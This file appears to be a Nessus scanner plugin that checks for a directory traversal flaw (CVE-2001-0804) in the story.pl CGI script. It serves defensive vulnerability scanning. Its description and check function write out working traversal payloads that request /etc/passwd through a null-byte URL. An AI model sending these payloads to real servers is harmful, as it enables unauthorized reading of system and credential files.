home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / story.nasl < prev    next >
Encoding:
Text File  |  2005-03-31  |  2.0 KB  |  84 lines
  1. #
  2. # This script was written by Georges Dagousset <georges.dagousset@alert4web.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10817);
  10.  script_bugtraq_id(3028);
  11.  script_version("$Revision: 1.16 $");
  12.  script_cve_id("CVE-2001-0804");
  13.  name["english"] = "Interactive Story Directory Traversal Vulnerability";
  14.  script_name(english:name["english"]);
  15.  
  16.  desc["english"] = "It is possible to read arbitrary files on
  17. the remote server by requesting :
  18.  
  19. GET /cgi-bin/story.pl?next=../../../file_to_read%00
  20.  
  21. An attacker may use this flaw to read arbitrary files on
  22. this server.
  23.  
  24. Solution: Upgrade story.pl to the latest version (1.4 or later).
  25. Risk factor : High";
  26.  
  27.  script_description(english:desc["english"]);
  28.  
  29.  summary["english"] = "Checks for the presence of /cgi-bin/story.pl";
  30.  script_summary(english:summary["english"]);
  31.  
  32.  script_category(ACT_GATHER_INFO);
  33.  
  34.  script_copyright(english:"This script is Copyright (C) 2001 Alert4Web.com");
  35.  family["english"] = "CGI abuses";
  36.  script_family(english:family["english"]);
  37.  
  38.  script_dependencie("find_service.nes", "http_version.nasl");
  39.  script_require_ports("Services/www", 80);
  40.  exit(0);
  41. }
  42.  
  43. #
  44. # The script code starts here
  45. #
  46.  
  47. include("http_func.inc");
  48. include("http_keepalive.inc");
  49.  
  50. function check(url)
  51. {
  52.  req = string(url, "?next=../../../../../etc/passwd%00");
  53.  req = http_get(item:req, port:port);
  54.  buf = http_keepalive_send_recv(port:port, data:req);
  55.  if(buf == NULL)exit(0);
  56.  if(egrep(pattern:"^HTTP/.* 404 .*", string:buf))return(0);
  57.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf))
  58.    {
  59.     security_hole(port);
  60.     exit(0);
  61.    }
  62.   
  63.   req = string(url, "?next=about");
  64.   req = http_get(item:req, port:port);
  65.   buf = http_keepalive_send_recv(port:port, data:req);
  66.   if( buf == NULL ) exit(0);
  67.   if (egrep(pattern:"This is version 1\.[0-3] of the story program", string:buf))
  68.    {
  69.     security_hole(port:port);
  70.     exit(0);
  71.    }
  72. }
  73.  
  74. port = get_http_port(default:80);
  75.  
  76. if(!get_port_state(port))exit(0);
  77.  
  78.  
  79. foreach dir ( cgi_dirs() )
  80. {
  81. check(url:string(dir, "/story.pl"));
  82. #check(url:string(dir, "/story/story.pl"));
  83. }
  84.